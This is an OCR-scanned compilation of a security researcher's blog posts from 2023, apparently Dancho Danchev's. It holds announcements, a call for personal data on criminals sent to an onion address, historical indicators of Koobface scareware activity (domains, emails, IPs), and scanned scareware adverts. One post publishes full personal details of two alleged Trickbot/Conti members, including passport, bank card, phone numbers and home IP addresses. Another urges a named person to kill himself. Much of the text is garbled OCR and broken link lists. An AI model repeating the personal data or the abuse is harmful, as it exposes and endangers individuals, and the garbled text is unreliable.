https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjVZMbWY 1NHJ3 j XT8JDcOoUVe2Ext 9hiNwhDyeW4deQ5RRk9 


pLwIA128VD1Q0-LcbjsfMNcFe0-OrLUXbIxGL3vm6m0W40vpjfx8VM 


. https: //blogger.googleusercontent .com/img/b/R29VZ2x1/AVVXsEjTxGjggyful1LSWywzUVbgUxUGi8nQXpN8uHvr gLQHezkO0b 
https: //blogger .googleusercontent .com/img/b/R29vVZ2x1/AVVXsEhZMHApO1sf iNkd7T6onPmX2wMUmX VCPUM9TAROE1pch6Pz 
zngA2CS4dnWGawmW7qD2E-Saik_vVzuEfDnKQ3DWEWORX7Lpp2 jMW 
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ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEi IKnuuFncRXpFi j 2UxPZqvSTOOY1GxQi12I IUE7YMqjQP3 
Ns-420TvirxOBLLDo1NiAY6buouRzPe82rQVW0z1f7-OKNr17AIDH 


https ://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEgly3LM163 j sAZSPRm- w39QIF4806t Pq-nGJ3m5RHLZecWC6 
RwskK9D9sfc5-p_71GvkFJ84haQpm1MUMX_F4Tw8FMASHpJ7mhWPeo 


0. 
11. 
viTi_7xp7Ltc9QE8Z7G5bWIr3Z4Tne JdzGRwkVeu7160QhzVRQStDzs 

12. 
13. https: //blogger.googleusercontent .com/img/b/R29VZ2x1/AVvXsEg42DBOuv40 jQF7ChvQGOY204ueegLmAFESM5ucCPiipui 
14. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEgNrv3LIhJYx9mvLrnzSDfUrqSHak0ifyy8qh_oE7nmL80 
f_TiQskKSsT5snClcyatD20humydfCJF5rUs20WOYBaQQqLUuGLpKUP66 

15. https://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEi0Kn7Qou0r0d3u- AZeZMd5rHNx_7981N7aFQZaVYgIXQk 

SY55R90w9rL7hp- j vNPUcBw8S6YHmbWV3KaS3a0DFV4B8LyDSNmbbTb 


19.9.24 My New Dark Web Onion - Soliciting Your Input On Personally Identifiable 
Information on the Bad Guys (2023-09-27 19:51) 


[1] 


Submit Files or Messages 


Browse... No files selected 


ES 


Dear blog readers, 


I’m soliciting your anonymous and pseudo anonymous tips including actual personally identi- 
fiable information on the bad guys on my newly launched Dark Web Onion where | promise 
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to communicate your tips and personally identifiable information on the bad guys to a vast 
network of contacts who might find it useful and relevant. 


Sample things you can submit include basically anything related to personally identifiable infor- 
mation on the bad guys and | promise that | will do my best to communicate your information 
to a vast network of people who might need it. 


My [2]Dark Web Onion address that’s soliciting your tips and anonymous and 
pseudo anonymous personally identifiable information on the bad guys is - 
[3]http://xabqzfedqnqdwhik2fy5gfekybehhmigqr2v4th3wvyyyc2vgnahd/7id.onio n 


Thank you and | hope that | will soon begin receiving submissions of personally identifiable 
information on the bad guys which I'll do my best to communicate to a vast network of people 
who need it. 


Stay tuned! 


1 
2. http: //xabqzf6dqnqdwhik2f y5gfekybehhml gqr2v4th3wvyyyc2vgnahd7 id. onion/ 
3, http:/ /rebget6aqnqauhik2ySgfekybebhn)gqr2véthdwvyyye2vgnahd7 id. onion/ 


19.9.25 Going Live on Twitter Spaces Today! (2023-09-29 15:24) 
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Dear folks, 
I’m going live on [2]Twitter Spaces today. | have a lot to explain. Stay tuned! 


1. https: //blogger.googleusercontent.com/img/a/AVvXsEgDOUUS5LZujUzHZzg007zh4wb JbuQVf WOWGF JAmwenykZV53_1C4Qcde 
1FgJdlioghtb9ryTErNUON10YObV7RPSLFIOOm_h-MN4mCe6M7rXNE 
2. https://twitter.com/dancho_danchev 


19.10 October 


19.10.1 Upcoming "The Hacker Scene - 1983 - 2023" E-Book (2023-10-03 02:17) 


[1] 
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&® mountaintrack.net 


Welcome to our Customer Support page! Consumer Support 
kh Contact Information 
Here yOu Can receive Tecrrcal tos on al possibie Questor and aves YOU mby Nave. 
Ty pou mart to view you purchase detals or cancel recurring Qarges please fn ou Bing repeal 7 days a week, HS 
Assttance Form 10 enter the Varsacton nformaton syiten. soa orl 
Phone Humber: 
UY you want to anply Sor refund, please use Refind Reporting Form. Avaliable orty for authorized customers 
tm 
17 you want to report Fraud Wansacton, please use Fraud Reoortng Form. a pri 


stampo. info - Email: enomman@gmail.com 
steepy. info - Email: stthatch@gmail.com 
strawy. info - Email: jaohra@gmail.com 
suivez. info - Email: krharbou@gmail.com 
sundery .info - Email: phvandiv@gmail.com 
surnam. info - Email: krharbou@gmail.com 
swoln. info - Email: acjspain@gmail.com 
swoons .info - Email: enomman@gmail.com 
taulus. info - Email: jaohra@gmail.com 
tenshy. info - Email: stthatch@gmail.com 


tented. info - Email: deciable@gmail.com 
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The Hacker 


scene - 
1983 - 2023 
é ; H ith the Hor Pro} 
Ma r ( wit 1 
Participated ir T ecret F a alled e Jorse 
jentified a maj t rwi aloAltoNetw 
| e 1e e it riasn 
Track nonitored and profiled th an t ne 
ot at 
} Slast t 
Ay Persor BI Ls rage 1 be 
M erA it 1 e 
iad IGE R 1 ni 
nave 7 r Blue bbath B k ee efer — We Hate 


Dear blog readers, 


I’m working on a new book. It’s called "The Hacker Scene - 1983 - 2023" where | aim to dazzle 
you as always and as usual with all the juicy technical details that you’re supposedly used to 
by now and will hopefully continue to be. 


| intend to release this throughout the Christmas season online for free on my [2]Archive.org 
account. 


Thank you. 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEhUEFrRzubWM8s j23Dj_4iXp1EomMyrG8QkdNaXRztx6a0Dg 
0it28Q0p1E64000E1c6ZVtNAI JbPUbxKmyzYCXcNwsAjQVQdbs1VM 
2. https://archive.org/details/@ddanche 
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19.10.2 The Most Innovative Leader in Cyber Security To Watch in 2023 Magazine 
Edition (2023-10-03 02:17) 


Dear blog readers, 
Here’s the original [1]article including the PDF [2]here. 


Thank you. 


Manche 
+anchey 


aT . 
tA Lasohes 
—Danches 


1. https://ciolook.com/in-pursuit-of-cyberjustice-dancho-danchev-navigating-the-world-of-cyberthreats/ 
2. https://drive.google.com/file/d/1b6i3H5 JGSUFMKMeEsRCBs7EPnsx0MTai/view?fbclid=IwARO9P JcLqRZk3dcPKGETdInJAx 


S4MpfatPPCedzdb3LWJF-rDBVP1Q3Bg 


3. https://blogger .googleusercontent.com/img/b/R29vZ2x1/AVvXsEj iToXMLh6PcBcVJF1IDZN3aivdgz7gz61uA8YgyVRtHU31 
EWt- 90U_zHQcpnXVsMOcJzpj2trf J-3FbeJ3dBeTXc-P9sfVPYijv 
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19.10.3 My First Twitter Space on How | Tracked Down The Conti Ransomware Gang 
Using Real-Time OSINT (2023-10-03 02:17) 


[1] 


(2) Dancho Danchey @ Host 


How | Tracked Down the Conti Ransomware Gang 
Using Real-Time OSINT? 


64 tuned in: Sep 29: 25:13 


P Play recording 


Dear blog readers, 


Listen [2]here. 


Enjoy. 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVVXsEjeP60kUk0Y36J00JoKKRd_41baw_foucCMtHvzxm1xYG77 
j AYKZDKsI-00P21RrTtSgY2FGCPKuESThOOOqvmG3vS 2ddoGL2wf8 
2. https://twitter.com/dancho_danchev/status/1707847083900723609 


19.10.4 Me Participating in a Comparative Air Force Research Laboratory Infor- 
mation Directorate Technical Report on Botnets and Malware Detection 
(2023-10-03 02:17) 


[1] 


Table 10: Anecdotal cases of malicious domain names detected by Notos and the 
corresponding days that appeared in the public BLs .[1]: hosts-file.net, [2]: 
malwareurl.com, [3] siteadvisor.com, [4] virustotal.com, [5] ddanchey.blogspot.com, [6] 
malwaredomainlist.com. 


Domain Name 


Izwn.in 

3b9.rmu 
antivirprotect.com 
Ispeed.info 
spy-destroyer.com 
free-spybot.com 
a3l.at 
gidromash.cn 
iantivirus-pro.com 
ericwanhouse.cn 
1165651291.com 
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Just came across [2]this. 


Outstanding. 


1. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEgYCeW7 cR7G8f£kMc JHiBzJSTYAOxcwxKvFGxX5gE0gmBEi 1 
aGpv3BO0gYzkz_JHx1Fvv96V1XsfY3MIKzEYd100nK8PdLWCc1DHVx 
2. https://apps.dtic.mil/sti/pdfs/ADA543919. pdf 


19.10.5 Who Can Assist With My Wikipedia Article Draft Submission? 
(2023-10-03 02:17) 


Dear blog readers, 


Who can assist with my Wikipedia Article Draft submission [1]here? Thanks. Much appreciated. 


[2] 
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1. https://en.wikipedia.org/wiki/Draft :Dancho_Danche 


2. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEjdHOe09f vbd3nmgUF ePwCy0s9 jH7YNTHPiDAtUm5Jtbga7q 
3poN_nNm56yA1P6h7 yKHeOIbY95QDFbB3 j XRHe2AnULVRgxa0Vk3 


19.10.6 Exposing Bentley and Liam From The Conti/Trickbot Malware Gang 
(2023-10-07 02:24) 


[1] 


Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nickname): liam 


Citizen of the Russian Federation 
Name: KORNEYEV ROMAN VIKTOROVYCH 
Date of birth: September 6, 1995 


A resident of St. Petersburg, Leningrad region of the 
Russian Federation. 

Driver's license: Ne 9906 549881 dated 16.05.2019 
Bank card: 427655005681 1014 Sberbank (RF) 


Mobile phone number: +79117265801 

Telegram 

Username: @romakorneev (Telegram-ID: 203978435) 
Skype: romankomeev2387 


E-mail address: krvthecreator@gmail.com 
E-mail: roman95@gmail.com 
E-mail: romka95@mail.ru 


Jabber: liam@q3meco35auwestmt.onion 
Jabber: LiamNeeson@jabber.ru 
Jabber: liamliam@xmpp.jp 


Home IP addresses: 
188.243.183.226 
188.243.199.19 


Social networks: 

- https://www.facebook.com/profile.php? id= 100003668932901 
https://www.youtube.com/channel/UCUH8mm WenoKpm3pCQzOPB1w?view_as=s 
ubscriber, 

- https://www.youtube.com/wwwroman95 

- https://vk.com/id2 3893726 


An image is worth a thousand video. A video (hxxp://youtube.com/watch?v=QwXs _GvsF7M) 
is worth less. 


Sample photos include: 
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[3] 
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[5] 
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Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nicknames): bentley / manuel / Max17 / volhvb 


Citizen of the Russian Federation 
Name: Galochkin Maxim Sergeevich 
Date of birth: May 19, 1982 


Identification number: 190119506002 

3 Passport of a citizen of the Russian Federation: 
9511766005 dated 08.06.1999 

Registration address: Russian Federation, 
Khakassia, Abakan, st. Kirov, building 80, apt. | 


Mobile phone number: +79 134448958 


Telegram: 

Name: Max The Tester 
Username: @volhvb, 
Telegram id: 32910255 


Jabber: bentley@q3mcco3 Sauwestmt.onion 
Jabber: benalien@xmpp.jp 
Jabber: volhvb@exploit.im 


Social networks: 

- https://twitter.com/volhvb 

- https://facebook .com/1505024528 
- https://vk.com/id520 1387 

- https://volhvb. livejournal.com 


Also check out the following (hxxp://youtube.com/watch?v=eqBJVa89rxE). 


Sample photos include: 


[8] 
28301 


[10] 
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ticedu. info - Email: enomman@gmail.com 
tithed. info - Email: bebrashe@gmail.com 
topful. info - Email: jaohra@gmail.com 
unclin. info - Email: stthatch@gmail.com 
undeaf. info - Email: enomman@gmail.com 
unowed. info - Email: enomman@gmail.com 
unwept. info - Email: stthatch@gmail.com 
usicam. info - Email: stthatch@gmail.com 
vagrom. info - Email: bebrashe@gmail.com 
veldun. info - Email: jaohra@gmail.com 
vipren. info - Email: calexing@gmail.com 
voided. info - Email: krharbou@gmail.com 
volsce. info - Email: krharbou@gmail.com 
washy. info - Email: phvandiv@gmail.com 
wincot. info - Email: enomman@gmail.com 
wiving. info - Email: enomman@gmail.com 
wooer. info - Email: jaohra@gmail.com 


xonker. info - Email: jaohnra@gmail.com 


Historical OSINT of Koobface scareware activity over a period of two weeks 
The following is a snapshot of Koobface scareware activity during the last two weeks, 
establishing a direct connection between the Koobface botnet, the ongoing blackhat SEO 


Campaigns, the Bahama botnet with scareware samples modifying HOSTS files, and an 
Ukrainian dating scam agency where the gang appears to be part of an affiliate network. 


Scareware samples pushed by Koobface, with associated detection rates: 
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Stay tuned! 


1. https: //blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEgw60RexeNxf£PQx34F 7 2GCM_RK8ieCtxiGFrte1lcTpx2Ufqf 


_ https://bLogger. googleusercont ent .con/ing//R29v22x1/AVWKsEzlLaf Frc xRUA1e4360U=D6viBb4vBeedcKeTUE424 2 
3, https: //blogger. goog] eusercont ent .con/ing//R29v22x1/AVWXsEMHEAVEXVaT4XOEZXO1W_SYaC-5]HYOYoOW-T2K-aiBaBys 
4. https: / blogger .googleusercontent.con/ing/b/R29v22x1 /AVWRaE gil Yadqa5tgVr3a-yOveDINDXay s6VWISHILGRK Ic Tab 
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BMUr0UU07 _A1zB8juxNYWCnPyW7 ZRU0d2ZnFzi JXSwHSWf£X18-qRD 


https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEggSqQqS2XBGkWn0rVKurZrQk_Wt_OAgCbxRPg3aanpe0Yo 


qI5uqNO0ciDhHQuGURCtmREnhcXp3hFUf-I0eY-NvhHnYI10CRIuJ 
sFESUyk1SpfZJ3nnxmAaYJ_z2Y9E6k_WPQP4_ngV4vrisgnL3cvbI 
https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvVXsEjPD7QrvA133Zfr1FnvxSNxJqxI oEyP- XUzL4xvvFSKrvEU: 


XrmJ3DPUbU9 Jwdoj gcSKerLvYQ- _CDNWeNTPJyevwd4eNvv3A8vHC 
https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEh9bK _4tQ-0g0i9DuMH19bTVP13_tXODvDbJcbNf J1UPo5hR 


c6tsS6X6HmToF y0Hq12e-e9KHKSHc9wROKmjHj074C_BTn-QleTjhA 
ttps://blogger . googleusercontent. com/img/b/R29vVZ2x1/AVvXsEivfdJRIU740N1Tg88£ JD£L8ink9xrhgPZdqmxwm4Au4BJS 
101i Y7QxdPHJ29_dp3Xm74BazqnLd9qvC3 j BLeQHCSwZZ 
0. https: //blogger .googleuser content. com/img/b/R29VZ2x1/AVVvXsEgOKAWULZ_FDohbY3BPt65sqzyQppwVokp6QOwUcSvhtnU 
S- JDDa60Buj vbpn7abVwhmbRp1LgBTbPQp0Vwo8dgC4CIJpVcLiltQ 
11. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEi_ztaFXoaZZOIv1k9Tnn50q1_05-LYBsD9GPYxTaVjnR 
cozj2L85Fxaqwng9F 1HJtxROB5ydyrJb4kCBExNuPf_eRod22QVimqi 
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19.10.7 Yavor Kolev - Part Four (2023-10-13 19:34) 


[1] 


. 
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Dear, 

Don’t tell me you got money to buy clothes? Is this a suit? Go grab some decent clothes first 
to begin with then go home and kill yourself. But do it loudly in the toilet but before that take 
a big "your work stuff" so that when we come to visit you we can take a photo of you in all of 
your glory the "your work stuff" part. 


Enjoy! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEhWyswRa8rRnWV5p0EOLomW j CpcA6Wdctt—ho94frocxEWkvx7Pkzssee 
2SC1R8z0F 4gnFdQoWkKZHDxBTe1l X2WzArCBHMLIdGyydr41iVvA99B 


19.10.8 Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! 
(2023-10-16 20:13) 


An image is worth a thousand words. Law Enforcement is also. These are the dipshits that 
kidnapped me. Period. 
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[6] 
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[10] 
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[11] 
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[40]mexcleaner .in - Email: niclas@i.ua 

[41]safetyscantool .com - 62.90.136.237 - Email: Suzanne.R.Muniz@trashymail.com 
[42]stabilitytoolsonline .com - Email: Brent.|.Purnell@pookmail.com 
[43]securitytestnetonline .com - 62.90.136.237 - Email: Dianne.T.Whitley@pookmail.com 
[44]securityprogramguide .com - Email: Kiyoko.T.Johnnson@mailinator.com 

[45 ]cheapsecurityscan .com - Email: Kevin.L.Linkous@trashymail.com 
[46]securitycheckwest .com; webbiztest .com - Email: Ruthie.R.Wilcox@mailinator.com 

[47 ]securitycodereviews .com - 62.90.136.237 - Email: Darwin.L.Mcgowan@trashymail.com 
[48]netmedtest .com - 62.90.136.237 - Email: Irene.D.Snow@trashymail.com 

[49 ]toolsdirectnow .com - Email: Frank.J.Bullard@trashymail.com 

(ratspywawe .in; wqdefender .in; pivocleaner .in; mexcleaner .in; sapesoft .in; alsoft 


.in; samosoft .in; jastaspy .in; lastspy .in; felupdate .info; inkoclear .info; dricleaner .info; 
tiposoft .info; fkupd .eu; piremover .eu; igsoft .eu; sersoft .eu) - [50]detection [51]rate 
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[19] 
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o Antivirus + 95%" 
aw | 


72% Of afl spy rere 5 nek detected by the major Are-wrus programs. Onty 
2 purposely Dull spyware removed tool such a4 AneiviTus ¢ Can! 


~ antivirus + features: 


© Spyware removal - detects and removes Spyware prograrns and 
Yojan horses nstaiied on your PC 

@ Homepage ioemtor Toot - browser Hyachers Delorping 00 thre farraty 
Cf SPyware ANG adware afe Capadle Of Laban COMBO! Over pour 
homepage and offer trvorte pages. and set an uningwn weosie 35 
pour homepage 

© System Cleanup - ebrrenates Te ¥aces of your system achubes 

© Desc cleanup - securely Oestoys af he Gata on pour old hard Osc 

© Quarantine . The infected fies Mut Cannot be fined of deleted are 
raved to 2 Quarantine folder and Grsplayed on Me Quararane pare 
of Arairus 

© User trendy Wirard Mode - he Quick Scan Wicard will help you run 
a scan in he bask scan modes 

© Auhorun Toot - € you want to know what applcatons run 
BAomascaly on your ByEtem ater Windows boots. 

© Open Ports Tool - without a protective application. your system is 
Getenseless and becomes highty waineratie to Troan programs. 

© Mary other features 


Total Cowntoacs 991601 


Last vodste Wednesday, October 7, 2009 


Total virus records: 728674 Gems 


etats.. Keo G maee MH o- BF 


SV) TRUE LIFE STORIES: Is my PC infected with SpyWare? 


Steve J. of New York had his sofware project C Oo you recetve a large Quantity Of SPAM (unsobctes 


avetsemerts 7 
Stolen Prough 2 toyan Bist pot ito hus corrouter 
Brough scene internet site. Steve ts stil suffering © YOu PC is runeinny extremely stow? 


thom 0 streng depreseion._ G You are pestered by those heeritte popup eds? 
Le C Your homepage keeps changing? 
© J380n W. was fred because hehas DEEN VISENG §—C Mewicons appear on your cesiice? 
Some prohibaed internet sates tom an ofice C Do you get tootbars n your Browser Bust you Cont want? 
Computer. bis BOSS Cpened Be wed Browsers © Do you downtosd any music tes from the Internet? 
hustory and saw af he sHes Jason has been C Do you Oownioad aed ircstal free software Noe the internet? 
sang Jason is $88 unemployed Q Do you use any P2P Me exchange systems (P2P) - tor exarmole 


Thomas S tost hes farraty Over fis passion tor Uteerert, BitTorrent, Kara eDonkey AudoGalary and Morpheus? 
teen sax sites His wife tured he computer on 
and some Teen Sax adpoppedup. Wexidayshe = ig 

you answered YES to any of these questions, there ts 
BR SRS Oe beR ot ee wen ier.. 2 95% chance that your computer is already infected with 


Grad K. of Castcenia hag his hand Grve formated = $eyvyare, KEEP YOUR SECURITY AND PRIVACY! 
Dy Somme Mmystenous program Last Par; he 


Visted Before hat was an Mega pomo sae After . 
that Brad's parents decided to send hen to = SCAM VOUR Pr ENR FREE 
Maatary School instead of Stantord_ “ 


4B cangacn cures: mae. 


Download locations of the actual scareware binary used over the past two weeks: 


Oni901s3feu60 .cn - Email: robertsimonkroon@gmail.com 
6j5aq93iu7yv4 .cn - Email: robertsimonkroon@gmail.com 
mf6gy4lj79ny5 .cn - Email: robertsimonkroon@gmail.com 
84u9wb2hsh4p6 .cn - Email: robertsimonkroon@gmail.com 
6pj2h8rqkhfw7 .cn - Email: robertsimonkroon@gmail.com 
7cib5fzf462g8 .cn - Email: robertsimonkroon@gmail.com 
7bs5nfzfkp8q8 .cn - Email: robertsimonkroon@gmail.com 
kt4lwumfhjb7a .cn - Email: robertsimonkroon@gmail.com 
q2bf0fzvjb5ca .cn - Email: robertsimonkroon@gmail.com 


rncocnspr44va .cn - Email: robertsimonkroon@gmail.com 
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[24] 
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[25] 
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[26] 
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[28] 
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[29] 
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[30] 
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[31] 
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[32] 
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[33] 


28332 


tleayoft9226b .cn - Email: robertsimonkroon@gmail.com 
4go4i9n76ttwd .cn - Email: robertsimonkroon@gmail.com 
kzvi4iiutrlle .cn - Email: robertsimonkroon@gmail.com 
hxc7jitg7k57e .cn - Email: robertsimonkroon@gmail.com 
mfbj6pquvjv8e .cn - Email: robertsimonkroon@gmail.com 
mt3pvkfmpi7de .cn - Email: robertsimonkroon@gmail.com 
fb7pxcqyb45o0e .cn - Email: robertsimonkroon@gmail.com 
fyivbri3bOdyf .cn - Email: robertsimonkroon@gmail.com 
Z6ailnvi94jgg .cn - Email: robertsimonkroon@gmail.com 
ue4x08f5myaqdl .cn - Email: robertsimonkroon@gmail.com 
p7keflvui9fkl .cn - Email: robertsimonkroon@gmail.com 
gjpwsc5p7oe3m .cn - Email: robertsimonkroon@gmail.com 
fluqldfi3qkcm .cn - Email: robertsimonkroon@gmail.com 
7mx1z5jqOnt3o .cn - Email: robertsimonkroon@gmail.com 
3uxyctrimiqeo .cn - Email: robertsimonkroon@gmail.com 
pOumob9k2g7mp .cn - Email: robertsimonkroon@gmail.com 
od32qjx6meqos .cn - Email: robertsimonkroon@gmail.com 
bnfdxhaelrgey .cn - Email: robertsimonkroon@gmail.com 


7zju2182i2zhz .cn - Email: robertsimonkroon@gmail.com 


What’s the deal with the historical OSINT and why wasn’t this data communicated right 
away? Keep reading. 
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28333 


[35] 
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[41] 
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[42] 


28341 


Si_8xGM8um9c3b9 JpnB9xI0y0zK2060WK277FCgxv-i-RiIMFQ1Q8 


2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEj tzYom2imPFDfCx0C1Qr jH3crKIyD31Yf£4Db1k8 j Siwf-Gb 


ZHETOQObSA18mwsFwGkKhdDOEnf0gk2txL_4uCQ8WGPioW6-3znjdf 


3. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEjAJHH3J7R4Uf ixrGVEOBd ju3L8uoAGUcM1ZhOFSwrnQFISh 


nGArYWVrxXHKbVCzf5wzdsS44Uc1 XUuRACOVWL8T7v_FQPT JnHt4k-0 


4. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEi7qcQVb5yqlgIkZ0GGiUg2M- oweyWogGs1SrznS3ihWVyTs 


AH6BNFi j 8nokOUZaFbJUYf£ON_MfLnvS7ztgG661cpRCyilPseSYms2 


5. https: //blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgm7 dewHcL86 ju3gtC7QVxXwiQ4a0eU jN2pXxMQ2WSVdTYy: 


E1Lsk01qU-50KdiSZxbS8cTQwd2bKDTnw2GLPmHZW4cpXj 5nBMMR19 


6. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEi5N_DVAHWApOBSXYWN1cvBO9T- d95m16w3TE1tRqAuT5UV 


nw84tRHt2-5-eF_9yyC2BV99dO0sR6dwp_1dGa4-hSka13x4VRioAq 


7. https: //blogger. googleusercontent . com/img/b/R29vZ2x1/AVvXsEgtduQWOcNVod8NS1gG8qrX_pQZYQ7wM4dcGEMeSRmf ezmfP 


fz8QW6e5nV/7NTVCaJ4p3PaVTQLTB6_Rz8tCkpN2WHfzTCRiRuulWz 
8. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhmz580B5VVegaQxY136kSiRizV1lifS-qNu0qp-PEYV1tK6Q 


28342 


Web images Maps Hews Shossing Video marev Signin 


Search | Stanced Search 
Preferences 


Web Results 1 - 0 for (0.07 seconds) 


Searches related to. 
Viagra for 0.99 USD 
Dont let the pharmacy 
compares beat you 
Buy Viagra orine 
for 0.99 USD 
theusa@rugs com 


Cialis for 1.99 USD 


Enhance the quality 


fora ki 99 USD 
mendrugsshop com 


Levitra for 4.5 USD: 
Make it hard 

and make it last 

again and again 

with the help 

of Lewitr 


heakhrefil. com 


Search | 


Search within results | Language Toots | Search Tips | Dissabsfied? Help us improve 


Home - Advertising Programs - Business Soldions - Privacy - ADoss 


The Bahama Botnet Connection 


During September, the folks at ClickForensics made an interesting observation regarding 
[52]my Ukrainian "fan club" and the ad revenue stealing/click-fraud committing botnet 
Bahama - some of the scareware samples were [53]modifying the HOSTS file and presenting 
the victim with "[54]one of those cybecrime-friendly search engines" stealing revenue in the 
process. 


Once the connection was also established by me at a later stage, data released in re- 
gard to [55]the New York Times malvertising attack once again revealed a connection between 
all campaigns - the very same domains used to serve the scareware, were also used in a 
blackhat SEO campaign which | analyzed a week before the incident took place. Basically, 
the [56]scareware pushed by the Koobface botnet, as well as the scareware pushed by 
the blackhat SEO campaigns maintained by the gangs is among the several propagation 
approaches used for the DNS records poisoning to take place: 
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OXuNOXVOWP1KzG_- jGM3Qs_6MRJcE6cwPoJaaE5-OLqjvMgiAVEbu 

ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVXsEh7d4AK8L1vqve-xRfMeWVkYtO9Vzk7MUHGg804mBlatKxQ2 
If0a17eGyNlsU2ovTJ6rR5toYVn0_60DNJuXcOPJjrEUIT4bAHQdB 
0. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEikuL3 JVB jt A-5WJEdKPGewu1FVLByx61QaBEoNUqWP1Sx 
qlVaj_PmdACiV-1ArxoMG4vpZfvirSwj2Lhsxvehflgh4Pgwg4tcxC 
11. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEg8Q27U9emtGiuHnskIVg01pm4wQBs7Qzw3wxXyJxWZf2Z 
qfbVF2x7e1lQcWhsICyGa3m0EXYMCf£vObn4CLfkdOER3im7 j3ixkpRM_D 
12. https://blogger.googleusercontent . com/img/b/R29vZ2x1/AVvXsEiU0B6n18uCQ5UPi3pYYEF javdffy4EPqf0wjabZfwpBxs 
OuMeOeTFEOUL1xr-qGqedxbIf pFfHbPsFaZSfn62ZF4V1ZAkIJW27VQb 
13. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgICnhMK j JYV-fKyLEMaiV1n31WVcTZrDTZRNeah3SbzTi 
rH6QON6fvskyb2xkrandcwFyaYeahaawre6I-Pu0suVdKN j 5Bgj4dK 
4. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgkbRJ38HRmrptCIk1DjaJ£K1qEsHy0Uc9XY45B30K1Y2 
oMPXL7Ua6FwWA6aNR- x1173CaGEJwsSRiisoxXeyN5-Ur_eNidzkZJQ 
15. https://blogger.googleusercontent .com/img/b/R29VZ2x1/AVvXsEgbMs1Utdd9g0zhueL19xIMZrcwb3x0x21f QmF AOZUU0wP 
LUBY y5ZTT8v6MT8sUSPiZVUT4_MdTvQC7obaj1xjXxY1DYYh-QJHhrH 
16. https://blogger.googleusercontent . com/img/b/R29vZ2x1/AVvXsEgD8PyTZ75is16tcgEOA7uTQ7 3PPeBLWENExTbX9AXhr9b 
DH-emrFptWrk_Z90gAGtn0 JxkyCbdWFnIDYpHpf vvE_nRANRtQbx-7d_ 
17. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhPargI JmoU42- qswvaUM1IXqh12nMsMDI2TX9Ds65t_F4 
2xkiJr6UC1xCYdVJkBudMr-OV2VirsVGnoPXEO- ycRLBQdbrZkL3LI2Q 
18. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEgBZtoh6kAF wOcxvurMEIbM2wNhwqqrk_D18tkso7zNnXx6 
THWr57nGWVQgLCEzhnENptHUESnaQu8 J35Wiws53E10NUS7RvQ9rkKLo 
9. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVVvXsEj1j2MM67m- p6FHO4Ywdb5ShkLSr7LkKCXlyhXvX5NhI 1gR 
GvsFspEMrfpy5pqkk_Ct8JCrWXYIO9psoAyH9iVWx9vMhUut vMiHFt 
0. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEjY3wQW17 16huSudXLiw4z8dP9Xi4_Qh-asYS9LPPudwo 
JcD2_cU4woKhgmeBilWjGuafwij2aERquxVHKSxANkJUJYo8y5Wacd 

ttps://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEid3aMgr 1zmUj 108hq- £Q2h8iC-NrVfpK_mR-8ttDVyPH 

inxiyt1lmwnbfhmSPPBOf jexPmiWqC- cmdBpOUKdonw1kUhdTGhtIpowQ 
22. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEjF_m8r0_29pPP10k0_E1QP6fm2tvHS8MoVQzRJIBH1e09 
jQPNSSgmU-z0jvjla2yhJPmetyn2AEvPegraG9yVXsXjXyTCy6pQFe9 
23. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEiUbQY 10AH6Uv8nk3khNsiulec9-61ZGf£G7vp1Dpzk_Pt 
de70GQn5Ah7PQIO2D580DWITqaULvOfD6woFxEw- AZUz32_Q1TRsk3m 
4. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgUAfbI899XBRBVNEKEK6pUDtMBc7hQWFOU6Qaai8_bmME 
ZUeZ1hDObU3 16 cmeFuZ19AXQ-8g2d5kR6raAkwe-w1lKM9kIpcS4Hx3R, 
25. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgy7 Jxu__C6NsLfqZjkMwH3wJiQ-YMxwb4n0PcD1Ds3Rz 
FI-46kE8upo1tFH4fPe0CPqkQ9LoqR1LhvYb-Qsd-D4dAEuhMiC4£k5k9 
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27. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvVXsEi-5iVOoCbHEiBU9dbX91eA16tUSphV_U8N1Cvqn5T-Gi 
HByqk6Vz2G5TvboveyYqPQT111nY_qldeeRPpeiu/7nFBPs1ZLuprof 
